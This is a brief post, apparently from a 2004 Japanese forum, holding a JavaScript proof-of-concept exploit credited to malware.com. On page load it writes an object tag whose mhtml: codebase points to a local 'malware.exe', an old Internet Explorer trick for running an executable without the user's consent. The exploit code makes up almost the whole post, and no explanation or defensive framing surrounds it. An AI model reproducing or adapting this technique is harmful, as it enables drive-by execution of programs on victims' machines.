2004/09/05 (日) 03:27:35 ◆ ▼ ◇ [mirai]<SCRIPT>
//25.02.03 - http://www.malware.com
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>malware.com</title>
<body scroll=no bgcolor=black>
<FONT face="Comic Sans MS" color=red style="position:absolute;top:20;
left:90;z-index:100; font-size:2cm;">malware.com </center>
<object style="cursor:cross-hair" alt="moo ha ha" classid="
clsid:77777777-7777-7777-7777" codebase="mhtml:'+path+'
\\My Pics.folder!malware.exe"></object>')
}
setTimeout("malware()",150)
</script>